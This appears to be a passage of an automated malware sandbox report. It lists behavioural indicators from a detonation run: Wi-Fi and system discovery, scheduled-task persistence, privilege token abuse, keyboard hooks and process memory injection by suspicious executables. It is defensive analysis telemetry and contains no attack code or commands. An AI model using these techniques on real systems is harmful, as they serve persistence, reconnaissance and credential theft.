Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysnldcvmr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3076928777.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PDFReader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	KillingInstructional.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Shopzilla.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	random.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	stories.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Amadeus.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Amadeus.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Shopzilla.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tuneaudiotool32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Amadeus.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TPB-1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	QuizPokemon.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	QuizPokemon.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_regiis.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

Internet Connection Discovery

T1016.001

pid	Process
1884	rundll32.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 10 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

Wi-Fi Discovery

T1016.002

pid	Process
1348	cmd.exe
5064	netsh.exe
2664	netsh.exe
7992	netsh.exe
3588	cmd.exe
4420	netsh.exe
3216	cmd.exe
1308	netsh.exe
2900	cmd.exe
2776	netsh.exe

Delays execution with timeout.exe 2 IoCs

pid	Process
6496	timeout.exe
7132	timeout.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

pid	Process
3248	WMIC.exe
3960	WMIC.exe
6564	WMIC.exe

Enumerates system info in registry 2 TTPs 14 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

pid	Process
1228	systeminfo.exe

Kills process with taskkill 2 IoCs

pid	Process
6276	taskkill.exe
2664	taskkill.exe

Modifies Control Panel 1 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Control Panel\Desktop\TileWallpaper = "0"	BingWallpaperApp.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Internet Explorer\Toolbar	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	Explorer.EXE

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133786810330824482"	chrome.exe

Modifies registry class 53 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1920x1080x96(1).bottom = "968"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	BackgroundTransferHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1920x1080x96(1).top = "260"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1920x1080x96(1).right = "1556"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MaxPos1920x1080x96(1).x = "4294967295"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Mode = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1920x1080x96(1).top = "327"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\MuiCache	BackgroundTransferHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616257"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1920x1080x96(1).y = "4294967295"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	BackgroundTransferHost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1920x1080x96(1).x = "4294967295"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MaxPos1920x1080x96(1).y = "4294967295"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe10000000c31c8bd7af18db019ca068d0c318db01331211f7644edb0114000000	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1920x1080x96(1).left = "417"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3\NodeSlot = "9"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1920x1080x96(1).right = "2145"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3\MRUListEx = ffffffff	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1920x1080x96(1).bottom = "901"	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48"	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A8CDFF1C-4878-43be-B5FD-F8091C1C60D0}\Instance\	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1920x1080x96(1).left = "1006"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupView = "0"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\LogicalViewMode = "3"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 03000000010000000200000000000000ffffffff	msedge.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

pid	Process
2444	reg.exe
1556	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 7 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
2624	schtasks.exe
5428	schtasks.exe
6376	schtasks.exe
6472	schtasks.exe
6656	schtasks.exe
2136	schtasks.exe
2136	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4936	powershell.exe
4936	powershell.exe
4936	powershell.exe
1284	stories.tmp
1284	stories.tmp
4732	powershell.exe
4732	powershell.exe
4732	powershell.exe
2632	powershell.exe
2632	powershell.exe
2632	powershell.exe
560	powershell.exe
560	powershell.exe
560	powershell.exe
1956	x.exe
1956	x.exe
4020	Paintball.com
4020	Paintball.com
4020	Paintball.com
4020	Paintball.com
4020	Paintball.com
4020	Paintball.com
4020	Paintball.com
4020	Paintball.com
4020	Paintball.com
4020	Paintball.com
4020	Paintball.com
4020	Paintball.com
4020	Paintball.com
4020	Paintball.com
4020	Paintball.com
4020	Paintball.com
4020	Paintball.com
4020	Paintball.com
4020	Paintball.com
4020	Paintball.com
4020	Paintball.com
4020	Paintball.com
4020	Paintball.com
4020	Paintball.com
4020	Paintball.com
4020	Paintball.com
4020	Paintball.com
4020	Paintball.com
4020	Paintball.com
4020	Paintball.com
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
5360	msedge.exe
5360	msedge.exe
5584	msedge.exe
5584	msedge.exe
1956	x.exe
1956	x.exe
1956	x.exe
1956	x.exe

Suspicious behavior: GetForegroundWindowSpam 4 IoCs

pid	Process
3236	7zFM.exe
3260	Explorer.EXE
4020	Paintball.com
1956	x.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 40 IoCs

pid	Process
5360	msedge.exe
5360	msedge.exe
5360	msedge.exe
5360	msedge.exe
5360	msedge.exe
5360	msedge.exe
5360	msedge.exe
5360	msedge.exe
5360	msedge.exe
5360	msedge.exe
3852	msedge.exe
3852	msedge.exe
3852	msedge.exe
3852	msedge.exe
3852	msedge.exe
3852	msedge.exe
3852	msedge.exe
3852	msedge.exe
3852	msedge.exe
3852	msedge.exe
3852	msedge.exe
3852	msedge.exe
6296	chrome.exe
6296	chrome.exe
6296	chrome.exe
6296	chrome.exe
6296	chrome.exe
6296	chrome.exe
6296	chrome.exe
6296	chrome.exe
6296	chrome.exe
6296	chrome.exe
6296	chrome.exe
1272	msedge.exe
1272	msedge.exe
6296	chrome.exe
6296	chrome.exe
6296	chrome.exe
6296	chrome.exe
6296	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	3236	7zFM.exe
Token: 35	3236	7zFM.exe
Token: SeSecurityPrivilege	3236	7zFM.exe
Token: SeDebugPrivilege	5032	New Text Document mod.exe
Token: SeDebugPrivilege	1956	x.exe
Token: SeDebugPrivilege	3496	4363463463464363463463463.exe
Token: SeDebugPrivilege	4936	powershell.exe
Token: SeDebugPrivilege	4732	powershell.exe
Token: SeDebugPrivilege	2632	powershell.exe
Token: SeDebugPrivilege	560	powershell.exe
Token: SeDebugPrivilege	1956	x.exe
Token: SeDebugPrivilege	4824	tasklist.exe
Token: SeDebugPrivilege	4368	tasklist.exe
Token: SeDebugPrivilege	1440	system32.exe
Token: SeIncreaseQuotaPrivilege	2136	WMIC.exe
Token: SeSecurityPrivilege	2136	WMIC.exe
Token: SeTakeOwnershipPrivilege	2136	WMIC.exe
Token: SeLoadDriverPrivilege	2136	WMIC.exe
Token: SeSystemProfilePrivilege	2136	WMIC.exe
Token: SeSystemtimePrivilege	2136	WMIC.exe
Token: SeProfSingleProcessPrivilege	2136	WMIC.exe
Token: SeIncBasePriorityPrivilege	2136	WMIC.exe
Token: SeCreatePagefilePrivilege	2136	WMIC.exe
Token: SeBackupPrivilege	2136	WMIC.exe
Token: SeRestorePrivilege	2136	WMIC.exe
Token: SeShutdownPrivilege	2136	WMIC.exe
Token: SeDebugPrivilege	2136	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2136	WMIC.exe
Token: SeRemoteShutdownPrivilege	2136	WMIC.exe
Token: SeUndockPrivilege	2136	WMIC.exe
Token: SeManageVolumePrivilege	2136	WMIC.exe
Token: 33	2136	WMIC.exe
Token: 34	2136	WMIC.exe
Token: 35	2136	WMIC.exe
Token: 36	2136	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2136	WMIC.exe
Token: SeSecurityPrivilege	2136	WMIC.exe
Token: SeTakeOwnershipPrivilege	2136	WMIC.exe
Token: SeLoadDriverPrivilege	2136	WMIC.exe
Token: SeSystemProfilePrivilege	2136	WMIC.exe
Token: SeSystemtimePrivilege	2136	WMIC.exe
Token: SeProfSingleProcessPrivilege	2136	WMIC.exe
Token: SeIncBasePriorityPrivilege	2136	WMIC.exe
Token: SeCreatePagefilePrivilege	2136	WMIC.exe
Token: SeBackupPrivilege	2136	WMIC.exe
Token: SeRestorePrivilege	2136	WMIC.exe
Token: SeShutdownPrivilege	2136	WMIC.exe
Token: SeDebugPrivilege	2136	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2136	WMIC.exe
Token: SeRemoteShutdownPrivilege	2136	WMIC.exe
Token: SeUndockPrivilege	2136	WMIC.exe
Token: SeManageVolumePrivilege	2136	WMIC.exe
Token: 33	2136	WMIC.exe
Token: 34	2136	WMIC.exe
Token: 35	2136	WMIC.exe
Token: 36	2136	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2660	WMIC.exe
Token: SeSecurityPrivilege	2660	WMIC.exe
Token: SeTakeOwnershipPrivilege	2660	WMIC.exe
Token: SeLoadDriverPrivilege	2660	WMIC.exe
Token: SeSystemProfilePrivilege	2660	WMIC.exe
Token: SeSystemtimePrivilege	2660	WMIC.exe
Token: SeProfSingleProcessPrivilege	2660	WMIC.exe
Token: SeIncBasePriorityPrivilege	2660	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3236	7zFM.exe
3236	7zFM.exe
1284	stories.tmp
4020	Paintball.com
4020	Paintball.com
4020	Paintball.com
5360	msedge.exe
5360	msedge.exe
5360	msedge.exe
5360	msedge.exe
5360	msedge.exe
5360	msedge.exe
5360	msedge.exe
5360	msedge.exe
5360	msedge.exe
5360	msedge.exe
5360	msedge.exe
5360	msedge.exe
5360	msedge.exe
5360	msedge.exe
5360	msedge.exe
5360	msedge.exe
5360	msedge.exe
5360	msedge.exe
5360	msedge.exe
5360	msedge.exe
5360	msedge.exe
5360	msedge.exe
5360	msedge.exe
5360	msedge.exe
5360	msedge.exe
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
5360	msedge.exe
5360	msedge.exe
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3852	msedge.exe
3852	msedge.exe
3852	msedge.exe
3852	msedge.exe
3852	msedge.exe
3852	msedge.exe
3852	msedge.exe
3852	msedge.exe
3852	msedge.exe
3852	msedge.exe
3852	msedge.exe
3852	msedge.exe
3852	msedge.exe
3852	msedge.exe
3852	msedge.exe
3852	msedge.exe
3852	msedge.exe
3852	msedge.exe
3852	msedge.exe
3852	msedge.exe
3852	msedge.exe
3852	msedge.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4020	Paintball.com
4020	Paintball.com
4020	Paintball.com
5360	msedge.exe
5360	msedge.exe
5360	msedge.exe
5360	msedge.exe
5360	msedge.exe
5360	msedge.exe
5360	msedge.exe
5360	msedge.exe
5360	msedge.exe
5360	msedge.exe
5360	msedge.exe
5360	msedge.exe
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
5360	msedge.exe
5360	msedge.exe
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3852	msedge.exe
3852	msedge.exe
3852	msedge.exe
3852	msedge.exe
3852	msedge.exe
3852	msedge.exe
3852	msedge.exe
3852	msedge.exe
3260	Explorer.EXE
3260	Explorer.EXE
3852	msedge.exe
3852	msedge.exe
3852	msedge.exe
3852	msedge.exe
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE

Suspicious use of SetWindowsHookEx 32 IoCs

pid	Process
3828	stories.exe
1284	stories.tmp
2944	tuneaudiotool32.exe
1956	x.exe
4604	aspnet_regiis.exe
3148	KillingInstructional.exe
4020	Paintball.com
4488	BitLockerToGo.exe
4020	Paintball.com
3260	Explorer.EXE
6032	Client.exe
6052	msedge.exe
6196	QuizPokemon.exe
5604	t.exe
6408	Shopzilla.pif
3260	Explorer.EXE
3260	Explorer.EXE
1368	center.exe
6492	CenterRun.exe
6660	SeetrolCenter.exe
6660	SeetrolCenter.exe
6660	SeetrolCenter.exe
6660	SeetrolCenter.exe
6292	Shopzilla.pif
6324	downloader.exe
5780	Sever Startup.exe
4904	new.exe
6488	SeetrolCenter.exe
6488	SeetrolCenter.exe
6488	SeetrolCenter.exe
6488	SeetrolCenter.exe
6964	random.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5032 wrote to memory of 1204	5032	New Text Document mod.exe	90
PID 5032 wrote to memory of 1204	5032	New Text Document mod.exe	90
